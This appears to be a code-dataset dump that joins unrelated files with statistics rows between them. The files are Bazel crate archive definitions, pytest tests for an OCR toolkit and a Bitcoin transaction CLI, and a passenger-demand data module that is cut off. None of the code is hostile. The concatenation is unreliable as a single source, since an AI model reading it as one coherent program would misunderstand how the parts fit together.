name = "complicated__regex__0_2_6",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/regex/regex-0.2.6.crate",
type = "tar.gz",
strip_prefix = "regex-0.2.6",
build_file = "//complicated_cargo_library_remote/cargo/remote:regex-0.2.6.BUILD"
)
native.new_http_archive(
name = "complicated__regex_syntax__0_4_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/regex-syntax/regex-syntax-0.4.2.crate",
type = "tar.gz",
strip_prefix = "regex-syntax-0.4.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:regex-syntax-0.4.2.BUILD"
)
native.new_http_archive(
name = "complicated__scopeguard__0_3_3",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/scopeguard/scopeguard-0.3.3.crate",
type = "tar.gz",
strip_prefix = "scopeguard-0.3.3",
build_file = "//complicated_cargo_library_remote/cargo/remote:scopeguard-0.3.3.BUILD"
)
native.new_http_archive(
name = "complicated__shred__0_5_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/shred/shred-0.5.2.crate",
type = "tar.gz",
strip_prefix = "shred-0.5.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:shred-0.5.2.BUILD"
)
native.new_http_archive(
name = "complicated__shred_derive__0_3_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/shred-derive/shred-derive-0.3.0.crate",
type = "tar.gz",
strip_prefix = "shred-derive-0.3.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:shred-derive-0.3.0.BUILD"
)
native.new_http_archive(
name = "complicated__smallvec__0_4_4",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/smallvec/smallvec-0.4.4.crate",
type = "tar.gz",
strip_prefix = "smallvec-0.4.4",
build_file = "//complicated_cargo_library_remote/cargo/remote:smallvec-0.4.4.BUILD"
)
native.new_http_archive(
name = "complicated__specs__0_10_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/specs/specs-0.10.0.crate",
type = "tar.gz",
strip_prefix = "specs-0.10.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:specs-0.10.0.BUILD"
)
native.new_http_archive(
name = "complicated__syn__0_10_8",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/syn/syn-0.10.8.crate",
type = "tar.gz",
strip_prefix = "syn-0.10.8",
build_file = "//complicated_cargo_library_remote/cargo/remote:syn-0.10.8.BUILD"
)
native.new_http_archive(
name = "complicated__syn__0_11_11",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/syn/syn-0.11.11.crate",
type = "tar.gz",
strip_prefix = "syn-0.11.11",
build_file = "//complicated_cargo_library_remote/cargo/remote:syn-0.11.11.BUILD"
)
native.new_http_archive(
name = "complicated__synom__0_11_3",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/synom/synom-0.11.3.crate",
type = "tar.gz",
strip_prefix = "synom-0.11.3",
build_file = "//complicated_cargo_library_remote/cargo/remote:synom-0.11.3.BUILD"
)
native.new_http_archive(
name = "complicated__thread_local__0_3_5",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/thread_local/thread_local-0.3.5.crate",
type = "tar.gz",
strip_prefix = "thread_local-0.3.5",
build_file = "//complicated_cargo_library_remote/cargo/remote:thread_local-0.3.5.BUILD"
)
native.new_http_archive(
name = "complicated__time__0_1_39",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/time/time-0.1.39.crate",
type = "tar.gz",
strip_prefix = "time-0.1.39",
build_file = "//complicated_cargo_library_remote/cargo/remote:time-0.1.39.BUILD"
)
native.new_http_archive(
name = "complicated__tuple_utils__0_2_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/tuple_utils/tuple_utils-0.2.0.crate",
type = "tar.gz",
strip_prefix = "tuple_utils-0.2.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:tuple_utils-0.2.0.BUILD"
)
native.new_http_archive(
name = "complicated__unicode_xid__0_0_4",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/unicode-xid/unicode-xid-0.0.4.crate",
type = "tar.gz",
strip_prefix = "unicode-xid-0.0.4",
build_file = "//complicated_cargo_library_remote/cargo/remote:unicode-xid-0.0.4.BUILD"
)
native.new_http_archive(
name = "complicated__unreachable__1_0_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/unreachable/unreachable-1.0.0.crate",
type = "tar.gz",
strip_prefix = "unreachable-1.0.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:unreachable-1.0.0.BUILD"
)
native.new_http_archive(
name = "complicated__utf8_ranges__1_0_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/utf8-ranges/utf8-ranges-1.0.0.crate",
type = "tar.gz",
strip_prefix = "utf8-ranges-1.0.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:utf8-ranges-1.0.0.BUILD"
)
native.new_http_archive(
name = "complicated__void__1_0_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/void/void-1.0.2.crate",
type = "tar.gz",
strip_prefix = "void-1.0.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:void-1.0.2.BUILD"
)
native.new_http_archive(
name = "complicated__winapi__0_3_4",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/winapi/winapi-0.3.4.crate",
type = "tar.gz",
strip_prefix = "winapi-0.3.4",
build_file = "//complicated_cargo_library_remote/cargo/remote:winapi-0.3.4.BUILD"
)
native.new_http_archive(
name = "complicated__winapi_i686_pc_windows_gnu__0_4_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/winapi-i686-pc-windows-gnu/winapi-i686-pc-windows-gnu-0.4.0.crate",
type = "tar.gz",
strip_prefix = "winapi-i686-pc-windows-gnu-0.4.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:winapi-i686-pc-windows-gnu-0.4.0.BUILD"
)
native.new_http_archive(
name = "complicated__winapi_x86_64_pc_windows_gnu__0_4_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/winapi-x86_64-pc-windows-gnu/winapi-x86_64-pc-windows-gnu-0.4.0.crate",
type = "tar.gz",
strip_prefix = "winapi-x86_64-pc-windows-gnu-0.4.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:winapi-x86_64-pc-windows-gnu-0.4.0.BUILD"
)
| 42.616471 | 138 | 0.65487 | 2,707 | 18,112 | 4.110085 | 0.043591 | 0.042064 | 0.060759 | 0.093475 | 0.929984 | 0.86536 | 0.818713 | 0.756696 | 0.652885 | 0.480227 | 0 | 0.056204 | 0.190537 | 18,112 | 424 | 139 | 42.716981 | 0.702681 | 0.004472 | 0 | 0.284932 | 1 | 0.147945 | 0.585118 | 0.292476 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00274 | true | 0 | 0 | 0 | 0.00274 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0754c2fb82c05b874aef809336d979b24632fe6a | 1,615 | py | Python | tests/ocr/test_customocr_object.py | IndicoDataSolutions/Indico-Solutions-Toolkit | c9a38681c84e86a48bcde0867359ddd2f52ce236 | [
"MIT"
] | 6 | 2021-05-20T16:48:27.000Z | 2022-03-15T15:43:40.000Z | tests/ocr/test_customocr_object.py | IndicoDataSolutions/Indico-Solutions-Toolkit | c9a38681c84e86a48bcde0867359ddd2f52ce236 | [
"MIT"
] | 25 | 2021-06-25T13:37:21.000Z | 2022-01-03T15:54:26.000Z | tests/ocr/test_customocr_object.py | IndicoDataSolutions/Indico-Solutions-Toolkit | c9a38681c84e86a48bcde0867359ddd2f52ce236 | [
"MIT"
] | null | null | null | import pytest
from indico_toolkit.indico_wrapper import DocExtraction
def test_full_text(indico_client, pdf_filepath):
doc_extraction = DocExtraction(indico_client, preset_config="simple")
custom_ocr = doc_extraction.run_ocr(filepaths=[pdf_filepath])
assert len(custom_ocr[0].full_text) == 2823
def test_full_text_exception(indico_client, pdf_filepath):
doc_extraction = DocExtraction(
indico_client,
custom_config={
"nest": True,
"top_level": "document",
"native_pdf": True,
"blocks": ["text", "position", "doc_offset", "page_offset"],
},
)
custom_ocr = doc_extraction.run_ocr(filepaths=[pdf_filepath])
with pytest.raises(Exception):
custom_ocr[0].full_text
def test_page_texts(indico_client, pdf_filepath):
doc_extraction = DocExtraction(
indico_client,
custom_config={
"nest": True,
"top_level": "document",
"native_pdf": True,
"pages": ["text", "size", "dpi", "doc_offset", "page_num", "image"],
"blocks": ["text", "position", "doc_offset", "page_offset"],
},
)
custom_ocr = doc_extraction.run_ocr(filepaths=[pdf_filepath])
assert isinstance(custom_ocr[0].page_texts, list)
assert isinstance(custom_ocr[0].page_texts[0], str)
def test_page_texts_exception(indico_client, pdf_filepath):
doc_extraction = DocExtraction(indico_client, preset_config="legacy")
custom_ocr = doc_extraction.run_ocr(filepaths=[pdf_filepath])
with pytest.raises(Exception):
custom_ocr.page_texts
| 34.361702 | 80 | 0.671827 | 190 | 1,615 | 5.352632 | 0.263158 | 0.079646 | 0.058997 | 0.090462 | 0.807276 | 0.780728 | 0.780728 | 0.717797 | 0.717797 | 0.717797 | 0 | 0.007042 | 0.208669 | 1,615 | 46 | 81 | 35.108696 | 0.788732 | 0 | 0 | 0.526316 | 0 | 0 | 0.118266 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4aca1a54f4e6e0b8dbb54440a7f0d2d42b7f1a65 | 5,470 | py | Python | tests/test_routes_files.py | altmirai/altpiggybank | 751590642e0a2a572310923fbd971acd0fdf8527 | [
"MIT"
] | null | null | null | tests/test_routes_files.py | altmirai/altpiggybank | 751590642e0a2a572310923fbd971acd0fdf8527 | [
"MIT"
] | 6 | 2020-08-13T13:45:12.000Z | 2020-08-14T15:08:41.000Z | tests/test_routes_files.py | altmirai/altpiggybank | 751590642e0a2a572310923fbd971acd0fdf8527 | [
"MIT"
] | 1 | 2020-08-13T16:16:00.000Z | 2020-08-13T16:16:00.000Z | from unittest import mock
from click.testing import CliRunner
from tests.test_data import TestDataOne, MockFeeEstOne
from src.routes import main
from src.files import excel_date
import datetime
import json
from hashlib import sha256
import os
t = TestDataOne()
def set_up_files():
tear_down_files()
os.mkdir(t.output_path)
def tear_down_files():
if os.path.exists(f"{t.output_path}/{t.vkhandle}.csv"):
os.remove(f"{t.output_path}/{t.vkhandle}.csv")
if os.path.exists(f"{t.output_path}/addr{t.vkhandle}.json"):
os.remove(f"{t.output_path}/addr{t.vkhandle}.json")
if os.path.exists(f"{t.output_path}/tx{t.vkhandle}.json"):
os.remove(f"{t.output_path}/tx{t.vkhandle}.json")
i = 1
while i < len(t.tx_inputs) + 1:
if os.path.exists(f"{t.output_path}/unsignedTx{t.vkhandle}_{i}.bin"):
os.remove(f"{t.output_path}/unsignedTx{t.vkhandle}_{i}.bin")
i += 1
if os.path.exists(t.output_path):
os.rmdir(t.output_path)
# TEST ADDR CSV FILE
@mock.patch('src.bitcoin_addresses.get_confirmed_sat_balance', return_value=t.confirmed_balance, autospec=True)
@mock.patch('src.models.get_tx_inputs', return_value=t.tx_inputs, autospec=True)
@mock.patch('src.routes.create_json_file', return_value=None, autospec=True)
def test_addr_csv_file(*args):
set_up_files()
runner = CliRunner()
result = runner.invoke(main, ['-out', t.output_path, 'addr',
t.pub_key_file_name, '-v', t.vkhandle, '-s', t.skhandle])
control_date = str(excel_date(datetime.datetime.now()))
file = open(f"{t.output_path}/{t.vkhandle}.csv", 'r')
test_csv = file.read().split(sep=', ')
file.close()
test_date = test_csv.pop()
tear_down_files()
assert result.exit_code == 0
assert test_date == control_date
assert test_csv[0] == t.vkhandle
assert test_csv[1] == t.skhandle
assert test_csv[2] == t.address
assert int(test_csv[3]) == t.confirmed_balance
# TEST ADDR JSON FILE
@mock.patch('src.bitcoin_addresses.get_confirmed_sat_balance', return_value=t.confirmed_balance, autospec=True)
@mock.patch('src.models.get_tx_inputs', return_value=t.tx_inputs, autospec=True)
@mock.patch('src.routes.create_csv_file', return_value=None, autospec=True)
def test_addr_json_file(*args):
set_up_files()
runner = CliRunner()
result = runner.invoke(main, ['-out', t.output_path, 'addr',
t.pub_key_file_name, '-v', t.vkhandle, '-s', t.skhandle])
file = open(f"{t.output_path}/addr{t.vkhandle}.json", 'r')
json_data = file.read()
file.close()
tear_down_files()
data = json.loads(json_data)
assert result.exit_code == 0
for key in data.keys():
assert data[key] == t.addr_json_file[key]
for key in t.addr_json_file.keys():
assert data[key] == t.addr_json_file[key]
# TEST REFRESH CSV FILE
@mock.patch('src.bitcoin_addresses.get_confirmed_sat_balance', return_value=t.confirmed_balance, autospec=True)
@mock.patch('src.models.get_tx_inputs', return_value=t.tx_inputs, autospec=True)
def test_refresh_csv_file(*args):
set_up_files()
runner = CliRunner()
result = runner.invoke(main, ['-out', t.output_path, 'refresh', t.addr_json_file_name])
control_date = str(excel_date(datetime.datetime.now()))
file = open(f"{t.output_path}/{t.vkhandle}.csv", 'r')
test_csv = file.read().split(sep=', ')
file.close()
test_date = test_csv.pop()
tear_down_files()
assert result.exit_code == 0
assert test_date == control_date
assert test_csv[0] == t.vkhandle
assert test_csv[1] == t.skhandle
assert test_csv[2] == t.address
assert int(test_csv[3]) == t.confirmed_balance
# TEST TX JSON FILE
@mock.patch('src.bitcoin_addresses.get_confirmed_sat_balance', return_value=t.confirmed_balance, autospec=True)
@mock.patch('src.models.get_tx_inputs', return_value=t.tx_inputs, autospec=True)
@mock.patch('src.routes.create_unsigned_tx_files', return_value=None, autospec=True)
def test_tx_json_file(*args):
set_up_files()
runner = CliRunner()
result = runner.invoke(main, ['-out', t.output_path, 'tx', t.tx_json_file_name, '-a', '-f', t.fee, '-r', t.recipient])
file = open(f"{t.output_path}/tx{t.vkhandle}.json", 'r')
json_data = file.read()
file.close()
tear_down_files()
data = json.loads(json_data)
assert result.exit_code == 0
for key in data.keys():
assert data[key] == t.tx_json_file[key]
for key in t.tx_json_file.keys():
assert data[key] == t.tx_json_file[key]
# TEST TX BIN FILES
@mock.patch('src.bitcoin_addresses.get_confirmed_sat_balance', return_value=t.confirmed_balance, autospec=True)
@mock.patch('src.models.get_tx_inputs', return_value=t.tx_inputs, autospec=True)
@mock.patch('src.routes.create_json_file', return_value=None, autospec=True)
def test_tx_bin_files(*args):
set_up_files()
runner = CliRunner()
result = runner.invoke(main, ['-out', t.output_path, 'tx', t.tx_json_file_name, '-a', '-f', t.fee, '-r', t.recipient])
if result.exit_code != 0:
tear_down_files()
assert result.exit_code == 0
i = 1
tx_bin_files = []
while i < len(t.tx_inputs) + 1:
file = open(f"{t.output_path}/unsignedTx{t.vkhandle}_{i}.bin", 'rb')
tx_bin_files.append(file.read().hex())
file.close()
i += 1
tear_down_files()
assert tx_bin_files == t.tosign_tx_hashed_hex
| 32.754491 | 122 | 0.682998 | 854 | 5,470 | 4.135831 | 0.124122 | 0.041619 | 0.065402 | 0.044168 | 0.848811 | 0.844564 | 0.833239 | 0.802661 | 0.736976 | 0.64949 | 0 | 0.005033 | 0.164534 | 5,470 | 166 | 123 | 32.951807 | 0.767834 | 0.01755 | 0 | 0.663866 | 0 | 0 | 0.190237 | 0.17738 | 0 | 0 | 0 | 0 | 0.168067 | 1 | 0.058824 | false | 0 | 0.07563 | 0 | 0.134454 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4addd4506bb6a2bc610d5d4c6aee1bbee378cad5 | 37,683 | py | Python | instances/passenger_demand/pas-20210421-2109-int1/98.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210421-2109-int1/98.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210421-2109-int1/98.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null |
"""
PASSENGERS
"""
numPassengers = 2262
passenger_arriving = (
(3, 10, 3, 3, 1, 0, 4, 8, 2, 2, 1, 0), # 0
(1, 5, 4, 2, 1, 0, 5, 6, 3, 0, 4, 0), # 1
(8, 6, 7, 5, 2, 0, 7, 6, 5, 4, 4, 0), # 2
(2, 3, 6, 4, 2, 0, 6, 5, 6, 1, 1, 0), # 3
(5, 3, 4, 3, 1, 0, 3, 4, 0, 3, 1, 0), # 4
(3, 5, 4, 6, 1, 0, 3, 10, 4, 4, 1, 0), # 5
(1, 3, 5, 2, 1, 0, 4, 5, 7, 2, 2, 0), # 6
(3, 6, 2, 2, 1, 0, 2, 8, 5, 3, 0, 0), # 7
(2, 3, 9, 1, 0, 0, 9, 7, 3, 5, 3, 0), # 8
(4, 7, 3, 4, 1, 0, 7, 4, 2, 2, 6, 0), # 9
(2, 4, 4, 3, 1, 0, 2, 3, 1, 4, 0, 0), # 10
(3, 9, 7, 1, 2, 0, 6, 7, 4, 3, 1, 0), # 11
(3, 6, 9, 1, 1, 0, 4, 7, 2, 6, 2, 0), # 12
(0, 5, 3, 2, 4, 0, 3, 8, 3, 5, 2, 0), # 13
(5, 12, 3, 1, 2, 0, 4, 4, 5, 2, 2, 0), # 14
(5, 5, 5, 3, 1, 0, 3, 5, 5, 6, 4, 0), # 15
(2, 6, 3, 0, 2, 0, 5, 4, 6, 2, 2, 0), # 16
(2, 7, 9, 1, 3, 0, 4, 5, 3, 3, 0, 0), # 17
(2, 5, 7, 1, 2, 0, 6, 7, 4, 2, 1, 0), # 18
(3, 10, 5, 2, 1, 0, 7, 6, 5, 3, 2, 0), # 19
(2, 4, 6, 1, 1, 0, 4, 5, 1, 3, 0, 0), # 20
(4, 2, 3, 2, 0, 0, 2, 8, 2, 3, 0, 0), # 21
(1, 5, 4, 1, 2, 0, 5, 9, 5, 4, 2, 0), # 22
(2, 5, 4, 3, 2, 0, 9, 10, 3, 2, 1, 0), # 23
(2, 7, 5, 3, 1, 0, 3, 12, 4, 2, 2, 0), # 24
(5, 8, 6, 2, 2, 0, 1, 4, 4, 5, 2, 0), # 25
(5, 4, 3, 1, 1, 0, 7, 8, 2, 0, 3, 0), # 26
(6, 11, 0, 0, 0, 0, 6, 8, 5, 5, 4, 0), # 27
(4, 7, 6, 2, 2, 0, 8, 8, 4, 4, 2, 0), # 28
(2, 9, 7, 2, 4, 0, 5, 4, 9, 0, 2, 0), # 29
(3, 8, 1, 1, 3, 0, 7, 3, 6, 4, 2, 0), # 30
(4, 5, 6, 4, 2, 0, 5, 5, 7, 6, 2, 0), # 31
(8, 6, 6, 7, 1, 0, 4, 8, 5, 6, 1, 0), # 32
(0, 7, 5, 4, 2, 0, 6, 9, 6, 7, 3, 0), # 33
(1, 4, 5, 5, 2, 0, 6, 5, 5, 1, 3, 0), # 34
(4, 3, 7, 2, 3, 0, 3, 9, 5, 2, 1, 0), # 35
(0, 4, 5, 1, 3, 0, 6, 6, 2, 7, 2, 0), # 36
(4, 6, 7, 1, 0, 0, 6, 3, 3, 4, 4, 0), # 37
(1, 8, 5, 7, 0, 0, 8, 5, 4, 7, 2, 0), # 38
(2, 9, 6, 2, 1, 0, 0, 8, 2, 7, 0, 0), # 39
(1, 7, 5, 2, 0, 0, 3, 7, 1, 3, 6, 0), # 40
(0, 6, 5, 3, 3, 0, 8, 7, 3, 5, 3, 0), # 41
(6, 9, 7, 5, 4, 0, 4, 8, 5, 3, 2, 0), # 42
(3, 8, 5, 5, 3, 0, 3, 5, 2, 6, 1, 0), # 43
(3, 5, 6, 1, 0, 0, 4, 6, 1, 2, 1, 0), # 44
(2, 7, 1, 2, 1, 0, 13, 7, 2, 6, 1, 0), # 45
(4, 4, 6, 2, 3, 0, 3, 5, 2, 6, 3, 0), # 46
(2, 6, 4, 3, 1, 0, 5, 2, 2, 3, 1, 0), # 47
(4, 6, 7, 3, 5, 0, 4, 7, 6, 1, 1, 0), # 48
(7, 7, 3, 2, 1, 0, 4, 3, 2, 2, 1, 0), # 49
(4, 6, 3, 2, 0, 0, 2, 5, 7, 4, 1, 0), # 50
(2, 7, 4, 4, 3, 0, 5, 3, 4, 1, 0, 0), # 51
(3, 7, 4, 2, 2, 0, 3, 3, 4, 4, 1, 0), # 52
(1, 7, 4, 2, 2, 0, 2, 5, 6, 4, 1, 0), # 53
(3, 7, 6, 1, 4, 0, 2, 3, 9, 3, 2, 0), # 54
(2, 7, 9, 1, 2, 0, 5, 7, 2, 4, 0, 0), # 55
(3, 6, 4, 0, 1, 0, 1, 8, 2, 4, 1, 0), # 56
(3, 6, 10, 2, 2, 0, 4, 3, 5, 5, 0, 0), # 57
(6, 7, 7, 7, 2, 0, 1, 6, 5, 1, 3, 0), # 58
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), # 59
)
station_arriving_intensity = (
(2.649651558384548, 6.796460700757575, 7.9942360218509, 6.336277173913043, 7.143028846153846, 4.75679347826087), # 0
(2.6745220100478, 6.872041598712823, 8.037415537524994, 6.371564387077295, 7.196566506410256, 4.7551721391908215), # 1
(2.699108477221734, 6.946501402918069, 8.07957012282205, 6.406074879227053, 7.248974358974359, 4.753501207729468), # 2
(2.72339008999122, 7.019759765625, 8.120668982969152, 6.4397792119565205, 7.300204326923078, 4.7517809103260875), # 3
(2.747345978441128, 7.091736339085298, 8.160681323193373, 6.472647946859904, 7.350208333333334, 4.750011473429951), # 4
(2.7709552726563262, 7.162350775550646, 8.199576348721793, 6.504651645531401, 7.39893830128205, 4.748193123490338), # 5
(2.794197102721686, 7.231522727272727, 8.237323264781493, 6.535760869565218, 7.446346153846154, 4.746326086956522), # 6
(2.817050598722076, 7.299171846503226, 8.273891276599542, 6.565946180555556, 7.492383814102565, 4.744410590277778), # 7
(2.8394948907423667, 7.365217785493826, 8.309249589403029, 6.595178140096618, 7.537003205128205, 4.7424468599033816), # 8
(2.8615091088674274, 7.429580196496212, 8.343367408419024, 6.623427309782609, 7.580156249999999, 4.740435122282609), # 9
(2.8830723831821286, 7.492178731762065, 8.376213938874606, 6.65066425120773, 7.621794871794872, 4.738375603864734), # 10
(2.9041638437713395, 7.55293304354307, 8.407758385996857, 6.676859525966184, 7.661870993589743, 4.736268531099034), # 11
(2.92476262071993, 7.611762784090908, 8.437969955012854, 6.7019836956521734, 7.700336538461538, 4.734114130434782), # 12
(2.944847844112769, 7.668587605657268, 8.46681785114967, 6.726007321859903, 7.737143429487181, 4.731912628321256), # 13
(2.9643986440347283, 7.723327160493828, 8.494271279634388, 6.748900966183574, 7.772243589743589, 4.729664251207729), # 14
(2.9833941505706756, 7.775901100852272, 8.520299445694086, 6.770635190217391, 7.8055889423076925, 4.7273692255434785), # 15
(3.001813493805482, 7.826229078984287, 8.544871554555842, 6.791180555555555, 7.8371314102564105, 4.725027777777778), # 16
(3.019635803824017, 7.874230747141554, 8.567956811446729, 6.810507623792271, 7.866822916666667, 4.722640134359904), # 17
(3.03684021071115, 7.919825757575757, 8.589524421593831, 6.82858695652174, 7.894615384615387, 4.72020652173913), # 18
(3.053405844551751, 7.962933762538579, 8.609543590224222, 6.845389115338164, 7.9204607371794875, 4.717727166364734), # 19
(3.0693118354306894, 8.003474414281705, 8.62798352256498, 6.860884661835749, 7.944310897435898, 4.71520229468599), # 20
(3.084537313432836, 8.041367365056816, 8.644813423843189, 6.875044157608696, 7.9661177884615375, 4.712632133152174), # 21
(3.099061408643059, 8.076532267115601, 8.660002499285918, 6.887838164251208, 7.985833333333332, 4.710016908212561), # 22
(3.1128632511462295, 8.108888772709737, 8.673519954120252, 6.899237243357488, 8.003409455128205, 4.707356846316426), # 23
(3.125921971027217, 8.138356534090908, 8.685334993573264, 6.909211956521739, 8.018798076923076, 4.704652173913043), # 24
(3.1382166983708903, 8.164855203510802, 8.695416822872037, 6.917732865338165, 8.03195112179487, 4.701903117451691), # 25
(3.1497265632621207, 8.188304433221099, 8.703734647243644, 6.9247705314009655, 8.042820512820512, 4.699109903381642), # 26
(3.160430695785777, 8.208623875473483, 8.710257671915166, 6.930295516304349, 8.051358173076924, 4.696272758152174), # 27
(3.1703082260267292, 8.22573318251964, 8.714955102113683, 6.934278381642512, 8.057516025641025, 4.69339190821256), # 28
(3.1793382840698468, 8.239552006611252, 8.717796143066266, 6.936689689009662, 8.061245993589743, 4.690467580012077), # 29
(3.1875, 8.25, 8.71875, 6.9375, 8.0625, 4.6875), # 30
(3.1951370284526854, 8.258678799715907, 8.718034948671496, 6.937353656045752, 8.062043661347518, 4.683376259786773), # 31
(3.202609175191816, 8.267242897727273, 8.715910024154589, 6.93691748366013, 8.06068439716312, 4.677024758454107), # 32
(3.2099197969948845, 8.275691228693182, 8.712405570652175, 6.936195772058824, 8.058436835106383, 4.66850768365817), # 33
(3.217072250639386, 8.284022727272728, 8.70755193236715, 6.935192810457517, 8.05531560283688, 4.657887223055139), # 34
(3.224069892902813, 8.292236328124998, 8.701379453502415, 6.933912888071895, 8.051335328014185, 4.645225564301183), # 35
(3.23091608056266, 8.300330965909092, 8.69391847826087, 6.932360294117648, 8.046510638297873, 4.630584895052474), # 36
(3.2376141703964194, 8.308305575284091, 8.68519935084541, 6.9305393178104575, 8.040856161347516, 4.614027402965184), # 37
(3.2441675191815853, 8.31615909090909, 8.675252415458937, 6.9284542483660125, 8.034386524822695, 4.595615275695485), # 38
(3.250579483695652, 8.323890447443182, 8.664108016304347, 6.926109375, 8.027116356382978, 4.57541070089955), # 39
(3.2568534207161126, 8.331498579545455, 8.651796497584542, 6.923508986928105, 8.019060283687942, 4.5534758662335495), # 40
(3.26299268702046, 8.338982421874999, 8.638348203502416, 6.920657373366013, 8.010232934397163, 4.529872959353657), # 41
(3.269000639386189, 8.34634090909091, 8.62379347826087, 6.917558823529411, 8.000648936170213, 4.504664167916042), # 42
(3.2748806345907933, 8.353572975852272, 8.608162666062801, 6.914217626633987, 7.990322916666666, 4.477911679576878), # 43
(3.2806360294117645, 8.360677556818182, 8.591486111111111, 6.910638071895424, 7.979269503546099, 4.449677681992337), # 44
(3.286270180626598, 8.367653586647727, 8.573794157608697, 6.906824448529411, 7.967503324468085, 4.420024362818591), # 45
(3.291786445012788, 8.374500000000001, 8.555117149758455, 6.902781045751634, 7.955039007092199, 4.389013909711811), # 46
(3.297188179347826, 8.381215731534091, 8.535485431763284, 6.898512152777777, 7.941891179078015, 4.356708510328169), # 47
(3.3024787404092075, 8.387799715909091, 8.514929347826087, 6.894022058823529, 7.928074468085106, 4.323170352323839), # 48
(3.307661484974424, 8.39425088778409, 8.493479242149759, 6.889315053104576, 7.91360350177305, 4.288461623354989), # 49
(3.312739769820972, 8.40056818181818, 8.471165458937199, 6.884395424836602, 7.898492907801418, 4.252644511077794), # 50
(3.317716951726343, 8.406750532670454, 8.448018342391304, 6.879267463235294, 7.882757313829787, 4.215781203148426), # 51
(3.322596387468031, 8.412796875, 8.424068236714975, 6.87393545751634, 7.86641134751773, 4.177933887223055), # 52
(3.3273814338235295, 8.41870614346591, 8.39934548611111, 6.868403696895425, 7.849469636524823, 4.139164750957854), # 53
(3.332075447570333, 8.424477272727271, 8.373880434782608, 6.8626764705882355, 7.831946808510638, 4.099535982008995), # 54
(3.336681785485933, 8.430109197443182, 8.347703426932366, 6.856758067810458, 7.813857491134752, 4.05910976803265), # 55
(3.341203804347826, 8.435600852272726, 8.320844806763285, 6.8506527777777775, 7.795216312056738, 4.017948296684991), # 56
(3.345644860933504, 8.440951171875001, 8.29333491847826, 6.844364889705882, 7.77603789893617, 3.9761137556221886), # 57
(3.3500083120204605, 8.44615909090909, 8.265204106280192, 6.837898692810458, 7.756336879432624, 3.9336683325004165), # 58
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 59
)
passenger_arriving_acc = (
(3, 10, 3, 3, 1, 0, 4, 8, 2, 2, 1, 0), # 0
(4, 15, 7, 5, 2, 0, 9, 14, 5, 2, 5, 0), # 1
(12, 21, 14, 10, 4, 0, 16, 20, 10, 6, 9, 0), # 2
(14, 24, 20, 14, 6, 0, 22, 25, 16, 7, 10, 0), # 3
(19, 27, 24, 17, 7, 0, 25, 29, 16, 10, 11, 0), # 4
(22, 32, 28, 23, 8, 0, 28, 39, 20, 14, 12, 0), # 5
(23, 35, 33, 25, 9, 0, 32, 44, 27, 16, 14, 0), # 6
(26, 41, 35, 27, 10, 0, 34, 52, 32, 19, 14, 0), # 7
(28, 44, 44, 28, 10, 0, 43, 59, 35, 24, 17, 0), # 8
(32, 51, 47, 32, 11, 0, 50, 63, 37, 26, 23, 0), # 9
(34, 55, 51, 35, 12, 0, 52, 66, 38, 30, 23, 0), # 10
(37, 64, 58, 36, 14, 0, 58, 73, 42, 33, 24, 0), # 11
